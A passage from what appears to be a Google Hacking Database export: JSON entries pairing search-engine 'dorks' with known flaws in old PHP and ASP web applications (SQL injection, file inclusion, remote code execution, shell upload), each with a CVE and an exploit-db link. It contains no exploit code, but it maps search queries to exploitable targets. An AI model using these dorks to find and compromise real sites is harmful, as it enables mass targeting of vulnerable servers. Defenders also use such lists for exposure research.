2007-1810: https://www.exploit-db.com/exploits/3626"}, {"dork": "\"Jinzora Media Jukebox\"", "description": "Jinzora 2.7 (include_path) Multiple Remote File Include Vulnerabilities - CVE: 2006-6770: https://www.exploit-db.com/exploits/3003"}, {"dork": "inurl:/modules/tinyevent/", "description": "XOOPS Module Tiny Event 1.01 (id) Remote SQL Injection - CVE: 2007-1811: https://www.exploit-db.com/exploits/3625"}, {"dork": "Powered by: AIH v2.1", "description": "Advanced Image Hosting (AIH) 2.1 Remote SQL Injection - CVE: 2008-2536: https://www.exploit-db.com/exploits/5601"}, {"dork": "inurl:\"/modules/jobs/\"", "description": "XOOPS Module Jobs 2.4 (cid) Remote SQL Injection - CVE: 2007-2370: https://www.exploit-db.com/exploits/3672"}, {"dork": "Uploader des fichiers", "description": "Service d'upload v1.0.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10938"}, {"dork": "[ Powered By x10media.com ]", "description": "x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities - CVE: 2009-4730: https://www.exploit-db.com/exploits/9340"}, {"dork": "inurl:/modules/camportail/", "description": "XOOPS Module Camportail 1.1 (camid) Remote SQL Injection - CVE: 2007-1808: https://www.exploit-db.com/exploits/3629"}, {"dork": "Copyright \u00a9 2007 by Horst-D. Kr\u00f6ller \u00b7 CMS: php WCMS", "description": "php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-5185: https://www.exploit-db.com/exploits/4477"}, {"dork": "inurl:\"com_booklibrary\"", "description": "Joomla Book Library 1.0 file inclusion - CVE: 2009-3817: https://www.exploit-db.com/exploits/9889"}, {"dork": "inurl:\"/modules/myads/\"", "description": "XOOPS Module MyAds Bug Fix 2.04jp (index.php) SQL Injection - CVE: 2007-1846: https://www.exploit-db.com/exploits/3603"}, {"dork": "\"Ladder Scripts by http://www.mygamingladder.com\"", "description": "My Gaming Ladder Combo System 7.0 Remote Code Execution - CVE: 2006-2002: https://www.exploit-db.com/exploits/1707"}, {"dork": "Powered By PHPDug version 2.0.0", "description": "PHPDug version 2.0.0 Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/11017"}, {"dork": "allinurl:show_memorial.php?id=", "description": "Memorial Web Site Script (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12351"}, {"dork": "intext:Powered by Mobilelib Gold v3", "description": "Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities - CVE: 2009-2788: https://www.exploit-db.com/exploits/9327"}, {"dork": "\"php-addressbook\"", "description": "PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities - CVE: 2008-2565: https://www.exploit-db.com/exploits/9023"}, {"dork": "inurl:\"com_jsjobs\"", "description": "Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities - CVE: 2009-4599: https://www.exploit-db.com/exploits/10366"}, {"dork": "inurl:com_iproperty", "description": "Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability - CVE: 2010-1721: https://www.exploit-db.com/exploits/12246"}, {"dork": "index.php?option=com_altas", "description": "Joomla Component altas 1.0 Multiple Remote SQL Injection: https://www.exploit-db.com/exploits/6002"}, {"dork": "inurl:\"index.php?module=pnFlashGames\"", "description": "PostNuke Module pnFlashGames 2.5 SQL Injection Vulnerabilities - CVE: 2008-2013: https://www.exploit-db.com/exploits/5500"}, {"dork": "Design by Satcom Co", "description": "Eshopbuilde CMS SQL Injection Vulnerability - CVE: 2009-4155: https://www.exploit-db.com/exploits/10253"}, {"dork": "intitle:\"ppc engine admin login form\"", "description": "PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities - CVE: 2007-0167: https://www.exploit-db.com/exploits/3104"}, {"dork": "\"powered by Albinator\"", "description": "Albinator 2.0.6 (Config_rootdir) Remote File Inclusion - CVE: 2006-2182: https://www.exploit-db.com/exploits/1744"}, {"dork": "inurl:\"/modules/library/\"", "description": "XOOPS Module Library (viewcat.php) Remote SQL Injectio - CVE: 2007-1815: https://www.exploit-db.com/exploits/3619"}, {"dork": "inurl:\"/modules/repository/\"", "description": "XOOPS Module Repository (viewcat.php) Remote SQL Injection - CVE: 2007-1847: https://www.exploit-db.com/exploits/3612"}, {"dork": "index.php?option=com_vr", "description": "Joomla Component QuickTime VR 0.1 Remote SQL Injection: https://www.exploit-db.com/exploits/5994"}, {"dork": "\"BioScripts\"", "description": "MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities - CVE: 2009-2573: https://www.exploit-db.com/exploits/8586"}, {"dork": "powered by vBulletin 3.8.6", "description": "vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability: https://www.exploit-db.com/exploits/14455"}, {"dork": "Powered by 2532|Gigs v1.2.2", "description": "2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities - CVE: 2008-6901: https://www.exploit-db.com/exploits/7510"}, {"dork": "\"Powered by bp blog 6.0\"", "description": "BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability - CVE: 2008-2554: https://www.exploit-db.com/exploits/5705"}, {"dork": "inurl:\"com_soundset\"", "description": "Joomla CB Resume Builder SQL Injection - CVE: 2009-3645: https://www.exploit-db.com/exploits/10064"}, {"dork": "inurl:\"/modules/zmagazine/\"", "description": "XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection - CVE: 2005-0725: https://www.exploit-db.com/exploits/3646"}, {"dork": "Powered by iScripts eSwap.", "description": "iScripts eSwap v2.0 sqli and xss vulnerability: https://www.exploit-db.com/exploits/13740"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns - CVE: 2009-2037: https://www.exploit-db.com/exploits/8853"}, {"dork": "inurl:/modules/wflinks", "description": "XOOPS Module WF-Links 1.03 (cid) Remote SQL Injection - CVE: 2007-2373: https://www.exploit-db.com/exploits/3670"}, {"dork": "inurl:\"/modules/myconference/\"", "description": "XOOPS Module MyConference 1.0 (index.php) SQL Injection - CVE: 2007-2737: https://www.exploit-db.com/exploits/3933"}, {"dork": "inurl:\"com_gameserver\"", "description": "Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability - CVE: 2009-3063: https://www.exploit-db.com/exploits/9571"}, {"dork": "inurl:com_annonces", "description": "Joomla Component com_annonces Upload Vulnerability: https://www.exploit-db.com/exploits/13748"}, {"dork": "inurl:\"fclick.php?fid\"", "description": "Fast Click (1.1.3 , 2.3.8) (show.php) Remote File Inclusion - CVE: 2006-2175: https://www.exploit-db.com/exploits/1740"}, {"dork": "\"powered by DreamAccount 3.1\"", "description": "DreamAccount 3.1 (auth.api.php) Remote File Include - CVE: 2006-6232: https://www.exploit-db.com/exploits/1954"}, {"dork": "allinurl:\"article.download.php\"", "description": "Star Articles 6.0 Remote File Upload Vulnerability - CVE: 2008-7076: https://www.exploit-db.com/exploits/7251"}, {"dork": "inurl:com_jp_jobs", "description": "Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability - CVE: 2010-1350: https://www.exploit-db.com/exploits/12191"}, {"dork": "\"Cms.tut.su, 2009 g.\"", "description": "CMS Chainuk 1.2 Multiple Remote Vulnerabilities - CVE: 2009-2333: https://www.exploit-db.com/exploits/9069"}, {"dork": "\"Powered By Aqua Cms\"", "description": "Aqua CMS (username) SQL Injection Vulnerability - CVE: 2009-1317: https://www.exploit-db.com/exploits/8432"}, {"dork": "inurl:\"com_jbudgetsmagic\"", "description": "Joomla com_jbudgetsmagic SQL injection vulnerability - CVE: 2009-3332: https://www.exploit-db.com/exploits/9723"}, {"dork": "inurl:\"com_soundset\"", "description": "Joomla Soundset 1.0 SQL Injection - CVE: 2009-3644: https://www.exploit-db.com/exploits/10067"}, {"dork": "Powered by MyPHP Forum v3.0", "description": "MyPHP Forum 3.0 (Final) Remote SQL Injection Vulnerability - CVE: 2008-0099: https://www.exploit-db.com/exploits/4831"}, {"dork": "\"Powered by CMS.GE\"", "description": "Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability - CVE: 2008-0253: https://www.exploit-db.com/exploits/4904"}, {"dork": "\"Site powered by GuppY\"", "description": "GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability - CVE: 2007-5844: https://www.exploit-db.com/exploits/4602"}, {"dork": "inurl:\"com_surveymanager\"", "description": "Joomla com_surveymanager SQL injection vulnerability - CVE: 2009-3325: https://www.exploit-db.com/exploits/9721"}, {"dork": "Powered by PHP F1 (Max's Image Uploader)", "description": "Max's Image Uploader Shell Upload Vulnerability - CVE: 2010-0390: https://www.exploit-db.com/exploits/11169"}, {"dork": "inurl:\"?option=com_bsadv\"", "description": "Joomla Boy Scout Advancement 0.3 (id) SQL Injection - CVE: 2009-2290: https://www.exploit-db.com/exploits/8779"}, {"dork": "\"Powered by PHP Live! v3.3\"", "description": "PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability - CVE: 2009-3062: https://www.exploit-db.com/exploits/9578"}, {"dork": "insite: SmarterMail Enterprise 7.1", "description": "SmarterMail 7.1.3876 Directory Traversal Vulnerability - CVE: 2010-3486: https://www.exploit-db.com/exploits/15048"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Multiple SQL Injection Vulnerabilities - CVE: 2009-2598: https://www.exploit-db.com/exploits/8844"}, {"dork": "\"Copyright KerviNet\"", "description": "KerviNet Forum 1.1 Multiple Remote Vulnerabilities - CVE: 2009-2326: https://www.exploit-db.com/exploits/9068"}, {"dork": "allinurl:option=com_rsmonials", "description": "Joomla Component rsmonials Remote Cross Site Scripting: https://www.exploit-db.com/exploits/8517"}, {"dork": "\"Powered by F3Site\"", "description": "F3Site 2.1 Remote Code Execution - CVE: 2007-0763: https://www.exploit-db.com/exploits/3255"}, {"dork": "\"Powered by ProjectCMS\"", "description": "ProjectCMS 1.1b Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8608"}, {"dork": "\"Powered by PunBB\"", "description": "PunBB Extension Attachment 1.0.2 SQL Injection: https://www.exploit-db.com/exploits/9849"}, {"dork": "\"Developed by rbk\"", "description": "InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities - CVE: 2009-2451: https://www.exploit-db.com/exploits/8558"}, {"dork": "Powered by Elvin Bug Tracking Server.", "description": "Elvin BTS 1.2.0 Multiple Remote Vulnerabilities - CVE: 2009-2123: https://www.exploit-db.com/exploits/8953"}, {"dork": "Powered By PHPFanBase", "description": "PHPFanBase 2.x (protection.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2957"}, {"dork": "\"Powered by wpQuiz\"", "description": "wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-6172: https://www.exploit-db.com/exploits/4668"}, {"dork": "inurl:\"com_ezine\"", "description": "Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability - CVE: 2009-4094: https://www.exploit-db.com/exploits/10178"}, {"dork": "\"Powered by ClanTiger\"", "description": "ClanTiger 1.1.1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8472"}, {"dork": "\"Power by:RichStrong CMS\"", "description": "RichStrong CMS (showproduct.asp cat) Remote SQL Injection - CVE: 2008-0291: https://www.exploit-db.com/exploits/4910"}, {"dork": "powered:powered by CMS", "description": "TinyMCE WYSIWYG Editor Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11358"}, {"dork": "\"Powered by Grayscale Blog\"", "description": "Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns - CVE: 2007-1432: https://www.exploit-db.com/exploits/3447"}, {"dork": "Powered by UCenter 1.5.0 \u00a9 2001 - 2008 Comsenz Inc.", "description": "Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability: https://www.exploit-db.com/exploits/12455"}, {"dork": "inurl:roschedule.php", "description": "phpScheduleIt 1.2.10 (reserve.php) Remote Code Execution - CVE: 2008-6132: https://www.exploit-db.com/exploits/6646"}, {"dork": "\"PHP Project Management 0.8.10\"", "description": "PHP Project Management 0.8.10 Multiple RFI / LFI Vulnerabilities - CVE: 2007-5641: https://www.exploit-db.com/exploits/4549"}, {"dork": "inurl:com_seyret", "description": "Joomla Seyret Video Component (com_seyret) Blind SQL Injection: https://www.exploit-db.com/exploits/14172"}, {"dork": "\"download this free gallery at matteobinda.com\"", "description": "ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities - CVE: 2008-0256: https://www.exploit-db.com/exploits/4900"}, {"dork": "Nwahy.com 2.1 , inurl:'add-site.html'", "description": "Nwahy Dir 2.1 Arbitrary Change Admin Password: https://www.exploit-db.com/exploits/9087"}, {"dork": "inurl:index.php?option=com_jombib", "description": "Joomla Component BibTeX 1.3 Remote Blind SQL Injection - CVE: 2007-4502: https://www.exploit-db.com/exploits/4310"}, {"dork": "\"nukeai beta3\"", "description": "PHP-Nuke NukeAI Module 3b (util.php) Remote File Include - CVE: 2006-6255: https://www.exploit-db.com/exploits/2843"}, {"dork": "\"Powered by UPB\"", "description": "Ultimate PHP Board 2.0b1 (chat/login.php) Code Execution: https://www.exploit-db.com/exploits/2999"}, {"dork": "intitle:\"owl intranet * owl\" 0.82", "description": "OWL Intranet Engine 0.82 (xrms_file_root) Code Execution - CVE: 2006-1149: https://www.exploit-db.com/exploits/1561"}, {"dork": "Copyright 2006-2009 Insane Visions", "description": "AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/10249"}, {"dork": "\"powered by JAMM\"", "description": "JAMM CMS (id) Remote Blind SQL Injection - CVE: 2008-2755: https://www.exploit-db.com/exploits/5789"}, {"dork": "inurl:\"printable_pedigree.php\"", "description": "Dog Pedigree Online Database 1.0.1b Multiple SQL Injection: https://www.exploit-db.com/exploits/8738"}, {"dork": "intext:\"Powered by Lore 1.5.6\"", "description": "re 1.5.6 (article.php) Blind SQL Injection: https://www.exploit-db.com/exploits/7896"}, {"dork": "\"powered by jmdcms.com\"", "description": "JMD-CMS Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/15044"}, {"dork": "\"Driven by DokuWiki\"", "description": "DokuWiki 2006-03-09b (dwpage.php) System Disclosure: https://www.exploit-db.com/exploits/2322"}, {"dork": "intext:\"Powered by Pc4Uploader v9.0\"", "description": "Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability - CVE: 2009-1742: https://www.exploit-db.com/exploits/8709"}, {"dork": "\"copyright 2006 Broadband Mechanics\"", "description": "PeopleAggregator 1.2pre6-release-53 Multiple RFI Vulnerabilities - CVE: 2007-5631: https://www.exploit-db.com/exploits/4551"}, {"dork": "\"powered by shutter v0.1.1\"", "description": "Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities - CVE: 2009-1650: https://www.exploit-db.com/exploits/8679"}, {"dork": "\"Powered by PHP Director 0.2\"", "description": "PHP Director 0.21 (sql into outfile) eval() Injection: https://www.exploit-db.com/exploits/8181"}, {"dork": "intitle:phpinfo intext:\"php version\" +windows", "description": "PHP 5.x COM functions safe_mode and disable_function bypass - CVE: 2007-5653: https://www.exploit-db.com/exploits/4553"}, {"dork": "\"S-CMS by matteoiamma\"", "description": "S-CMS 2.0b3 Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/8914"}, {"dork": "inurl:\"modules/articles/index.php?cat_id=\"", "description": "XOOPS module Articles 1.03 (index.php cat_id) SQL Injection - CVE: 2007-3311: https://www.exploit-db.com/exploits/3594"}, {"dork": "\"by Pivot - 1.40.5\" +'Dreadwind' -pivotlog.net", "description": "Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure - CVE: 2008-3128: https://www.exploit-db.com/exploits/5973"}, {"dork": "\"PHP Easy Downloader\"", "description": "PHP Easy Downloader 1.5 (save.php) Remote Code Execution: https://www.exploit-db.com/exploits/2812"}, {"dork": "\"Powered by LoudBlog\"", "description": "LoudBlog 0.5 (id) SQL Injection / Admin Credentials Disclosure - CVE: 2006-3832: https://www.exploit-db.com/exploits/2050"}, {"dork": "\"Powered by visinia\"", "description": "Visinia 1.3 Multiple Vulnerabilities - https://www.exploit-db.com/exploits/14879"}, {"dork": "\"Splatt Forum\u00a9\"", "description": "PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion - CVE: 2007-1633: https://www.exploit-db.com/exploits/3518"}, {"dork": "\"Powered by Seditio\"", "description": "Seditio CMS 121 Remote SQL Injection - CVE: 2007-6202: https://www.exploit-db.com/exploits/4678"}, {"dork": "aspWebLinks 2.0", "description": "aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change - CVE: 2006-2848: https://www.exploit-db.com/exploits/1859"}, {"dork": "inurl:/webquest/soporte_derecha_w.php?", "description": "PHP Webquest 2.5 (id_actividad) Remote SQL Injection - CVE: 2007-4920: https://www.exploit-db.com/exploits/4407"}, {"dork": "intext:\"Powered by pppblog\"", "description": "pppBlog 0.3.8 (randompic.php) System Disclosure - CVE: 2006-2770: https://www.exploit-db.com/exploits/1853"}, {"dork": "inurl:\"printable_pedigree.php\"", "description": "Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling: https://www.exploit-db.com/exploits/8739"}, {"dork": "\"Powered by Leap\"", "description": "Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities - CVE: 2009-1615: https://www.exploit-db.com/exploits/8577"}, {"dork": "\"BioScripts\"", "description": "MiniTwitter 0.2b Remote User Options Change - CVE: 2009-2574: https://www.exploit-db.com/exploits/8587"}, {"dork": "inurl:sysinfo.cgi ext:cgi", "description": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution - CVE: 2006-1831: https://www.exploit-db.com/exploits/1677"}, {"dork": "\"Powered by Burning Board\" -exploit -johnny", "description": "Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection - CVE: 2007-0812: https://www.exploit-db.com/exploits/3262"}, {"dork": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "description": "Exponent CMS 0.96.3 (view) Remote Command Execution - CVE: 2006-4963: https://www.exploit-db.com/exploits/2391"}, {"dork": "\"Powered by PMOS Help Desk\"", "description": "PMOS Help Desk 2.4 Remote Command Execution - CVE: 2007-6550: https://www.exploit-db.com/exploits/4789"}, {"dork": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "description": "RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution - CVE: 2006-4723: https://www.exploit-db.com/exploits/2328"}, {"dork": "Site powered By Limbo CMS", "description": "Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection - CVE: 2008-0734: https://www.exploit-db.com/exploits/5088"}, {"dork": "inurl:naviid + inurl:liste9", "description": "Aiyoota! CMS - Blind SQL Injection: https://www.exploit-db.com/exploits/7490"}, {"dork": "\"POWERED BY PHPNUKE.IR\"", "description": "PHPnuke 8.2 Remote Upload File: https://www.exploit-db.com/exploits/14058"}, {"dork": "inurl:\"com_gcalendar\"", "description": "Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability - CVE: 2009-4099: https://www.exploit-db.com/exploits/10232"}, {"dork": "Powered by WikyBlog", "description": "WikyBlog v1.7.3rc2 Multiple Vulnerabilities - CVE: 2010-0754: https://www.exploit-db.com/exploits/11560"}, {"dork": "\"powered by yourtube\"", "description": "YourTube 2.0 Arbitrary Database Disclosure: https://www.exploit-db.com/exploits/9073"}, {"dork": "FhImage, powered by Flash-here.com", "description": "Fhimage 1.2.1 Remote Index Change: https://www.exploit-db.com/exploits/7820"}, {"dork": "\"Powered by: Arab Portal v2\"", "description": "Arab Portal v2.x (forum.php qc) Remote SQL Injection - CVE: 2009-2781: https://www.exploit-db.com/exploits/9320"}, {"dork": "\"Powered by PHP iCalendar\"", "description": "PHP iCalendar 2.24 (cookie_language) LFI / File Upload - CVE: 2008-5967: https://www.exploit-db.com/exploits/6519"}, {"dork": "POWERED BY ALITALK", "description": "ALITALK 1.9.1.1 Multiple Remote Vulnerabilities - CVE: 2008-0371: https://www.exploit-db.com/exploits/4922"}, {"dork": "Copyright 2010. Software Index", "description": "Software Index (Remote File Upload) Exploit: https://www.exploit-db.com/exploits/13999"}, {"dork": "\"Powered by MDForum\"", "description": "MDForum 2.0.1 (PNSVlang) Remote Code Execution - CVE: 2006-6869: https://www.exploit-db.com/exploits/3057"}, {"dork": "\"Powered by mojoPortal\"", "description": "mojoportal Multiple Remote Vulnerabilities - CVE: 2010-3602: https://www.exploit-db.com/exploits/15018"}, {"dork": "intitle:\"login to cacti\"", "description": "Cacti 0.8.6i (copy_cacti_user.php) SQL Injection: https://www.exploit-db.com/exploits/3045"}, {"dork": "\"BioScripts\"", "description": "MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8778"}, {"dork": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "description": "PHP Advanced Transfer Manager 1.30 Source Code Disclosure: https://www.exploit-db.com/exploits/2968"}, {"dork": "Small Business Manager", "description": "Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15313"}, {"dork": "\"Powered by webSPELL\"", "description": "webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability - CVE: 2009-1408: https://www.exploit-db.com/exploits/8453"}, {"dork": "\"Powered by IMGallery\"", "description": "IMGallery 2.5 Create Uploader Script - CVE: 2007-0082: https://www.exploit-db.com/exploits/3049"}, {"dork": "intext:\"Powered by Plogger!\" -plogger.org", "description": "Plogger Beta 2.1 Administrative Credentials Disclosure: https://www.exploit-db.com/exploits/1621"}, {"dork": "\"Powered by FreeWebshop.org 2.2.1\"", "description": "FreeWebshop 2.2.1 Remote Blind SQL Injection - CVE: 2007-6466: https://www.exploit-db.com/exploits/4740"}, {"dork": "\"powered by XHP CMS\"", "description": "XHP CMS 0.5 (upload) Remote Command Execution - CVE: 2006-1371: https://www.exploit-db.com/exploits/1605"}, {"dork": "Portal By vbPortal Version 3.5.0", "description": "vbPortal 3.0.2 3.6.0 b1 (cookie) Remote Code Excution - CVE: 2006-4004: https://www.exploit-db.com/exploits/2087"}, {"dork": "\"Copyright @2007 Iatek LLC\"", "description": "PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities - CVE: 2008-4612: https://www.exploit-db.com/exploits/4848"}, {"dork": "\"& Spider Friendly by Crack\"", "description": "phpBB Spider Friendly Module 1.3.10 File Include - CVE: 2006-5665: https://www.exploit-db.com/exploits/2686"}, {"dork": "intitle:\"login to cacti\"", "description": "Cacti 0.8.6i cmd.php popen() Remote Injection: https://www.exploit-db.com/exploits/3029"}, {"dork": "Welcome to your PHPOpenChat-Installation!", "description": "ADODB 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection: https://www.exploit-db.com/exploits/1652"}, {"dork": "\"powered by TSEP - The Search Engine Project\"", "description": "TSEP 0.942.02 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/9057"}, {"dork": "WEBalbum 2004-2006 duda", "description": "WebAlbum 2.02pl COOKIE[skin2] Remote Code Execution - CVE: 2006-1480: https://www.exploit-db.com/exploits/1608"}, {"dork": "\"Powered by Zomplog\"", "description": "Zomplog 3.8.1 upload_files.php Arbitrary File Upload - CVE: 2007-5230: https://www.exploit-db.com/exploits/4466"}, {"dork": "intext:\"Powered by simplog\"", "description": "Simplog 0.9.2 (s) Remote Commands Execution - CVE: 2006-0146: https://www.exploit-db.com/exploits/1663"}, {"dork": "\"Powered by SMF\"", "description": "Simple Machines Forum 1.1 rc2 local inclusion: https://www.exploit-db.com/exploits/2231"}, {"dork": "inurl:php-stats.js.php", "description": "Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE: 2006-7173: https://www.exploit-db.com/exploits/3502"}, {"dork": "\"Powered by MercuryBoard\"", "description": "MercuryBoard 1.1.4 (User-Agent) Remote SQL Injection: https://www.exploit-db.com/exploits/2247"}, {"dork": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "description": "Drake CMS 0.4.11 Remote Blind SQL Injection - CVE: 2008-6475: https://www.exploit-db.com/exploits/5391"}, {"dork": "\"Driven by DokuWiki\"", "description": "DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution: https://www.exploit-db.com/exploits/2321"}, {"dork": "\"powered by php update\"", "description": "PHP-Update 2.7 (admin/uploads.php) Remote Code Execution - CVE: 2006-6878: https://www.exploit-db.com/exploits/3020"}, {"dork": "Realizzato utilizzando Web Portal", "description": "WebPortal CMS 0.6-beta Remote Password Change - CVE: 2008-0142: https://www.exploit-db.com/exploits/4835"}, {"dork": "\"powered by ILIAS\"", "description": "ILIAS LMS 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns: https://www.exploit-db.com/exploits/9151"}, {"dork": "\"This site is powered by CMS Made Simple\"", "description": "CMS Made Simple 1.2.4 (FileManager module) File Upload - CVE: 2008-2267: https://www.exploit-db.com/exploits/5600"}, {"dork": "\"by eXtreme Crew\"", "description": "extreme-fusion 4.02 Remote Code Execution: https://www.exploit-db.com/exploits/2937"}, {"dork": "\"2007 Rafal Kucharski\"", "description": "RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection - CVE: 2009-1910: https://www.exploit-db.com/exploits/8648"}, {"dork": "\"This forum powered by Phorum.\"", "description": "Phorum 5 (pm.php) Arbitrary Local Inclusion - CVE: 2006-3611: https://www.exploit-db.com/exploits/2008"}, {"dork": "\"is proudly powered by WordPress\"", "description": "Wordpress 2.0.6 wp-trackback.php Remote SQL Injection - CVE: 2007-0233: https://www.exploit-db.com/exploits/3109"}, {"dork": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "description": "Woltlab Burning Board Lite 1.0.2 Blind SQL Injection: https://www.exploit-db.com/exploits/2842"}, {"dork": "FhImage, powered by Flash-here.com", "description": "Fhimage 1.2.1 Remote Command Execution: https://www.exploit-db.com/exploits/7821"}, {"dork": "\"powered by blur6ex\"", "description": "blur6ex 0.3.462 (ID) Admin Disclosure / Blind SQL Injection - CVE: 2006-3065: https://www.exploit-db.com/exploits/1904"}, {"dork": "\"Powered by Claroline\" -demo", "description": "Claroline 1.7.4 (scormExport.inc.php) Remote Code Execution: https://www.exploit-db.com/exploits/1627"}, {"dork": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "description": "Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection - CVE: 2006-6237: https://www.exploit-db.com/exploits/2841"}, {"dork": "\"Personal .NET Portal\"", "description": "Personal.Net Portal Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15067"}, {"dork": "\"SmodBIP\" & \"Aktualno.ci\"", "description": "SmodBIP 1.06 (aktualnosci zoom) Remote SQL Injection - CVE: 2007-1920: https://www.exploit-db.com/exploits/3678"}, {"dork": "\"SmodCMS\" & \"S.ownik\"", "description": "SmodCMS 2.10 (Slownik ssid) Remote SQL Injection - CVE: 2007-1931: https://www.exploit-db.com/exploits/3679"}, {"dork": "\"is a product of Lussumo\"", "description": "Vanilla 1.1.3 Remote Blind SQL Injection - CVE: 2007-5643: https://www.exploit-db.com/exploits/4548"}, {"dork": "inurl:\"index.php?name=PNphpBB2\"", "description": "PNphpBB2 1.2 (index.php c) Remote SQL Injection - CVE: 2007-3052: https://www.exploit-db.com/exploits/4026"}, {"dork": "\"Powered by Online Grades\"", "description": "Online Grades & Attendance 3.2.6 Credentials Changer SQL injection: https://www.exploit-db.com/exploits/8843"}, {"dork": "\"Powered by ClanTiger\"\t", "description": "ClanTiger 1.1.1 Multiple Cookie Handling Vulnerabilities: https://www.exploit-db.com/exploits/8471"}, {"dork": "inurl:/modules/lykos_reviews/", "description": "XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection - CVE: 2007-1817: https://www.exploit-db.com/exploits/3618"}, {"dork": "\"Powered By X7 Chat\"", "description": "X7 Chat 2.0.4 (old_prefix) Remote Blind SQL Injection - CVE: 2006-3851: https://www.exploit-db.com/exploits/2068"}, {"dork": "\"powered by guestbook script\"", "description": "GuestBook Script 1.7 (include_files) Remote Code Execution: https://www.exploit-db.com/exploits/1575"}, {"dork": "index.php?option=com_ezine", "description": "Joomla Component D4JeZine 2.8 Remote BLIND SQL Injection - CVE: 2007-1776: https://www.exploit-db.com/exploits/3590"}, {"dork": "inurl:/modules/xfsection/", "description": "XOOPS Module XFsection 1.07 (articleid) BLIND SQL Injection - CVE: 2005-0725: https://www.exploit-db.com/exploits/3645"}, {"dork": "inurl:\"phpwcms/index.php?id=\"", "description": "phpwcms 1.2.6 (Cookie: wcs_user_lang) Local File Include: https://www.exploit-db.com/exploits/2758"}, {"dork": "\"Copyright Devellion Limited 2005. All rights reserved.\"", "description": "CubeCart 3.0.11 (oid) Remote Blind SQL Injection - CVE: 2006-4267: https://www.exploit-db.com/exploits/2198"}, {"dork": "inurl:/modules/debaser/", "description": "XOOPS Module debaser 0.92 (genre.php) BLIND SQL Injection- CVE: 2007-1805: https://www.exploit-db.com/exploits/3630"}, {"dork": "\"Powered by Quick.Cms\"", "description": "Quick.Cms.Lite 0.3 (Cookie sLanguage) Local File Include - CVE: 2006-5834: https://www.exploit-db.com/exploits/2719"}, {"dork": "inurl:/modules/rmgallery/", "description": "XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection - CVE: 2007-1806: https://www.exploit-db.com/exploits/3633"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\"", "description": "phpMyChat 0.14.5 (SYS enter) Remote Code Execution: https://www.exploit-db.com/exploits/1646"}, {"dork": "\"Basado en Spirate\"", "description": "Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4936: https://www.exploit-db.com/exploits/8819"}, {"dork": "\"Barbecued by sNews\"", "description": "sNews 